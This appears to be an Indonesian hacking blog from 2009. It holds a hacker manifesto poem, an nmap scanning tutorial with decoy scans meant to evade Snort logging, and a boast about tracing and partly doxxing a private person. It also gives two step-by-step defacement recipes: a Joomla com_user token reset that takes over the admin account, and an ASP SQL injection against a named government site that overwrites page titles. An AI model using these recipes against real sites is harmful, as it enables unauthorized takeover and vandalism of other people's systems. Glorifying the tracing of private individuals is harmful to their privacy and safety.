• a little shit of letters

    apa ? mengapa ? siapa ?

^_^

Posted by dulz-slavotski On Senin, Mei 11, 2009 0 komentar

jika kamu menginkan sesuatu hal yang ingin kamu miliki.
pasti kamu akan lakukan berbagai cara untuk memilikinya.
Ya Kami juga berfikir demikian,
bekerja dalam dunia digital..
untuk memperoleh semua pengetahuan yang kami mau.
walaupun mereka anggap kami ini penjahat sekalipun,
namun itu bukanlah sebuah alasan
untuk menhentikan niat kami untuk mencari pengetahuan
Kami Mengabdi Pada Tanah Air Dimana kami dilahirkan
Disatu sisi kami berbagi
Tapi Bukan Untuk Di Puji
Disatu sisi kami di benci
Tapi Bukan Untuk Di Kasihani
Kau, Kami Anggap Penjahat ?
Tapi Kami Anggap Kau Penjilat ?
Memandang Rendah Kami Sebagai Orang Pecundang
Menuntut Kami Dengan Kekuatan Hukum
Menindas Kami Sebagai Pengacau Masa depan
Kami Bukanlah Hacker, Carder atau Cracker
Kami Hanyalah Sekumpulan
Anak Muda Yang Senang Berbagi Pengetahuan
Tapi Disatu Sisi Kami Mengunci Dunia Untuk Masa Depan

@copyright
elv1n4

Posted by dulz-slavotski On Sabtu, Mei 09, 2009 0 komentar

credit : gembelciputat.netne.net

molaai.....langsung lah kaga pake cuap cuap...disini menjelaskan dasar dan konsep penggunaan nmap (port scanner) untuk mencari tahu port2 berapa sajakah yang terbuka di sisi target. Jikalau ada kesalahan2 penulisan atau ada kesalahan keterangan, harap di koreksi ya.. soalnya saya juga masih dalam masa tahap pembelajaran. bagi teman2 yang sudah mengerti silahkan ditambahkan lagi ya artikelnya, biar bisa lebih dalam lagi pengertian kita dalam penggunaan nmap.

[–1. Apakah nmap itu?
nmap adalah port scanner yang sangat terkenal dalam dunia hacking. dan banyak sekali digunakan untuk mengaudit suatu system, dimana untuk mengetahui port yang terbuka yang memungkinkan port tersebut dapat di exploitasi oleh sang intruder. selain NMAP msh banyak lagi port scanner di belahan dunia internet, seperti : superscan, THC, BluesPortTool, dll.

[–2. Penjelasan
nmap di versi terbaru sekarang ini sudah mempunyai fitur yang sangat baik sekali, bahkan bisa dikatakan lengkap. Ini sangat membantu sekali pada saat kita memulai scanning atau mulai "mengintip" port yang terbuka di komputer target. NMAP memiliki banyak dalam hal teknik sanning, seperti: UDP, TCP Connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas tree, Null scan, dll lah.. NMAP juga mempunyai kelebihan untuk mengetahui OS apa yang dipakai oleh target.. Mmm.. Keren kan!! yang nggak kalah mantepnya, di versi terbarunya bisa spoof IP dan MAC kita. Begh… Mantep Coy!! ini berguna agar IP dan MAC kita tidak bisa diketahui (anonimitas di jaringan).
Pada prakteknya saya menggunakan nmap di windows, namun di windows ada beberapa fungsi yang tidak dapat dijalankan tetapi dapat dijalankan di Linux :( . saya juga menggunakan firewall ZA (untuk melihat log yang dilakukan intruder), dan kadang saya matikan firewall tersebut (untuk melihat port yang benar2 terbuka di komputer saya). karena bila kita memakai firewall, ada port2 khusus yang dia block dan di tutup secara logical oleh si firewall.
"Woi!, buruan dong tutorialnya.. malah ngebacot lagi!!" Ok.. Ok… sabar ya, sedikit lagi langsung praktek koq. hehehehe…:D

[–3. Platform yang didukung NMAP
Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS,

[–4. Depedencies pada penginstall NMAP
bila kita menginginkan nmap berjalan di windows kita harus membutuhkan yang namanya WinPCAP. Download dan installah di komputer anda. dapat di download di link bawah ini:


Download nmap di link bawah ini. pada directory penginstallan, itu terserah anda peletakkannya.. tp klo bisa ya di "C:\nmap" biar mudah aksesnya lewat cmd. :D


Performansi dari nmap bisa anda baca di websitenya. Tp, Ketika saya coba di Linux, nmap lebih cepat prosesnya dari pada di windows. Itu menurut saya seh.. mungkin ada yang kebalikannya.

[–4. Basic Scanning
Bila ingin melihat help dari nmapnya
C:\nmap>nmap -h

Nmap adalah Tool untuk eksplorasi jaringan. Merupakan salah satu tool andalan yang sering digunakan oleh Administrator Jaringan, Pen-Test (IT Developer yg dibayar untuk mencari Hole pada System Jaringan) serta Attacker. Tool ini digunakan sebagaimana namanya yaitu Penjelajah System Jaringan (Network Mapper, Network Exploration Tool). Dengan Nmap kamu bisa melakukan Probing (probe) keseluruh jaringan dan mencari tahu service apa yang aktif pada port yang lebih spesifik. Buka saja hanya itu tapi juga mencampur fingerprinting (Banner Grap) yang bisa membandingkan dan memberikan estimasi akan apa jenis Sistem Operasi (OS) target. Ok tanpa basa basi kita langsung ja coba langsung. Misalkan saja kita cari target buat coba-coba,misalkan saja kita mengambil target:

Contoh 1: Anda ingin mengetahui port berapa sajakah yang terbuka dari port 1-65535 dan OS apakah yang dipakai oleh si target.
C:\nmap>nmap -v -sS -p1-65535 -O 192.168.1.2

maksudnya:
-v = verbose
-sS = stealth scan
-p = port yang di scan
-O = OS detection
192.168.1.2 = target

hasilnya:

Starting Nmap 4.11 ( http://www.insecure.org/nmap ) at 2006-10-07 16:14
Standard Time
Initiating ARP Ping Scan against 192.168.1.2 [1 port] at 16:14
The ARP Ping Scan took 0.08s to scan 1 total hosts.
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is d
Try using –system-dns or specify valid servers with –dns_servers
DNS resolution of 1 IPs took 0.02s.
Initiating SYN Stealth Scan against 192.168.1.2 [65535 ports] at 16:14
Discovered open port 23/tcp on 192.168.1.2
Discovered open port 25/tcp on 192.168.1.2
Discovered open port 80/tcp on 192.168.1.2
Discovered open port 443/tcp on 192.168.1.2
Discovered open port 5900/tcp on 192.168.1.2
Discovered open port 445/tcp on 192.168.1.2
Discovered open port 135/tcp on 192.168.1.2
Discovered open port 139/tcp on 192.168.1.2
Discovered open port 1066/tcp on 192.168.1.2
The SYN Stealth Scan took 23.05s to scan 65535 total ports.
For OSScan assuming port 23 is open, 1 is closed, and neither are firewa
Host 192.168.1.2 appears to be up … good.
Interesting ports on 192.168.1.2:
Not shown: 65526 closed ports
PORT STATE SERVICE
23/tcp open telnet
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1066/tcp open unknown
5900/tcp open vnc
MAC Address: 00:17:31:AC:48:4D (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows 2003/.NET|NT/2K/XP
OS details: Microsoft Windows 2003 Server or XP SP2
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: Incremental

Nmap finished: 1 IP address (1 host up) scanned in 24.328 seconds
Raw packets sent: 68100 (2.997MB) | Rcvd: 65551 (3.016MB)

Nah, sudah bisa anda lihat kan port2 yang terbuka dan OS yang dipakai si target.. O iya, untuk menjalankan -sS (stealth scanning) anda harus punya hak akses sebagai admin. Mm.. ingin gaining komputer tersebut?? Susah Boy..!! Hehe.. Lanjut ah..

contoh 2: Yang diatas kan cuman port dan informasi servicenya saja.. sekarang kita akan melihat service dan version dari port2 yang terbuka tersebut. keep your eyes with me!
C:\nmap>nmap -v -sV -p1-65535 -O 192.168.1.2

hasilnya : beberapa output saya edit supaya nggak kebanyakan.
23/tcp open telnet Microsoft Windows XP telnetd
25/tcp open smtp Microsoft ESMTP 6.0.2600.2180
80/tcp open http Microsoft IIS webserver 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft
1066/tcp open msrpc Microsoft Windows RPC
5900/tcp open vnc VNC (protocol 3.3; Locked out)

Nah, sekarang terlihatlah versionnya. :D

contoh 3:
Pada saat kita melakukan scanning, sebenarnya IP kita tercatat di log firewall atau snort bila anda menggunakan snort. Nah, klo dah ketahuan.. Game Over dech… dah nggak seru lagi dong.. tinggal nungguin di samperin aja ama si target. :D
Sekarang bgmn caranya kita menjaga anonimitas IP atau nmap footprinting kita pada saat melakukan scanning. Konsepnya kita bisa melakukan Decoy atau pengelabuan suatu source (check me if i wrong). waduh, kyanya bingung neh. kita langsung praktek dech.. disini kita menggunakan IDS. O iya, komputer kita dengan IP 192.168.1.1 dan target 192.168.1.2
C:\nmap>nmap -v -sV -p 22 -O 192.168.1.2
pada saat kita melakukan scanning.. snort mencatat lognya seperti ini :
[**] SCAN nmap TCP [**]
11/07-01:33:18.752219 192.168.1.1:55464 -> 192.168.1.2:22
TCP TTL:46 TOS:0x0 ID:12633 IpLen:20 DgmLen:60
***A**** Seq: 0x18D5EF65 Ack: 0x0 Win: 0xC00 TcpLen: 40
TCP Options (4) => WS: 10 NOP MSS: 265 TS: 1061109567 0

Nah, ketahuan kan IP kita.. :D "Kata si snort, I got U.." skrg kita menggunakan Decoy, pada alamat Decoy asal2an saja kita masukin alamat IPnya.

C:\nmap>nmap –v –sV –O –D 192.168.2.10 -p 22 192.168.1.2
lognya seperti ini :
[**] SCAN nmap TCP [**]
11/07-12:01:08.582551 192.168.2.10:35522 -> 192.168.1.2:22
TCP TTL:46 TOS:0x0 ID:1902 IpLen:20 DgmLen:60
***A**** Seq: 0x2B740381 Ack: 0x0 Win: 0xC00 TcpLen: 40
TCP Options (4) => WS: 10 NOP MSS: 265 TS: 1061109567 0

Hehe.. IP kita nggak tercatat.. "kata si attacker, U can’t get me".

fiuuh, Akhirnya finish juga...dah ah cape ngetik nya..

nii tools nya :


http://nmap.org/dist/nmap-4.85BETA8-setup.exe


http://nmap.org/dist/nmap-4.85BETA8-win32.zip

Nmap binaries for Mac OS X
http://nmap.org/dist/nmap-4.85BETA8.dmg

TRACERT SUCCES TARGET HAS BEEN TAKEDOWN

Posted by dulz-slavotski On Sabtu, Mei 09, 2009 0 komentar

yah yah...ni result habis ngetrace someone mpe masuk system dia.sayang bandwitch gag kuad =(
habisnya gw flame kalo di tantangin..wakakkakakaka.....keluar dah skillnya :P

notebook

IP XX.XX.XX.XX
OS under windows
modem huawei = smart
no hp XXXXXXX
location jakarta pusat
tepatnya di XXXXXX (privasi)
yaaa yang lainnya gag bisa di sebutin :D

privasi orang ^^

okeh :P

cara trace nya tar gw share kalo gw uda lancar
ni juga kemaren di ajarin ama c om ^^
sebagian dia yang trace :P

Deface with Token

Posted by dulz-slavotski On Sabtu, Mei 09, 2009 0 komentar

langsung cooyyy....

thanx to : bobyhikaru

masuk k http://www.google.com

2.klik/search inurl:option=com_user daerah tujuancontoh: inurl:option=com_user pekan baru

3. misalkan dapet korban
http://target/home/index.php?option=com_user&task=register

lihat warna yang merah akan di ganti dengan

option=com_user&view=reset&layout=confirm



nah di situ akan keluar token

token tersebut di isi dengan tanda....
' <----------- (tanda petik)
terus kalo berhasil km akan di bawa menuju
tempat mengisi password baru dan konfirmasi password baru....

isi lah dengan sesuka hati.....

lanjut...................

langah berikutnya
setelah di berhasil isi pass tersebut anda harus login lagi dengan nama/ username

Admin
nah kalo passwordnya yaitu adalah password yang baru anda buat tadi.....

credit : milw0rm ( d3m0n)

fiiuh..ngeripper^^..habisnya cape gw . :P

ASP INJECTION

Posted by dulz-slavotski On Sabtu, Mei 09, 2009 0 komentar

yah ni tutor gw tau dari anak|jendraL ..tutor pertama gw kenal deface



okok .langsung ke tkp :


1. cari target di google dengan keyword : default.asp?newsID=4352 ( contoh aja masih banyak kok yang lain)

2. uda dapet? contohnya : http://www.pyyr.gov.cn/new_show.asp?id=8887

3. cek bisa di injek apa gak dgn cara tambah kan tanda ‘ di akhir URL

http://www.pyyr.gov.cn/new_show.asp?id=8887′

klo errornya gini

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号。

/new_show.asp,行 89

maka lanjutkan perjuangan mu ok

4. Buat mencari bugnya gunakan having 1=1

http://www.pyyr.gov.cn/new_show.asp?id=8887 having 1=1

maka mucul pesan akan eror

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/new_show.asp,行 89

5. Uda ketemu kan coloumnya? itu tuh main.id

6. trus http://www.pyyr.gov.cn/new_show.asp?id=8887 group by main.id having 1=1;–

maka muncul pesan error :

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/new_show.asp,行 89

7. Uda ketemu kan titlenya ini nih main.title langsung aja update

http://www.pyyr.gov.cn/new_show.asp?id=8887 update main set title=’hacked by YOU’

diperhatiin kolomnya jangan ampe salah ya.

klo uda tinggal buka aja homenya

Jreeeng news smua berubah jadi defaced by YOU

thanks to anak|jendral, Ronald_Pa1000, bang Jo2, bang Hmei7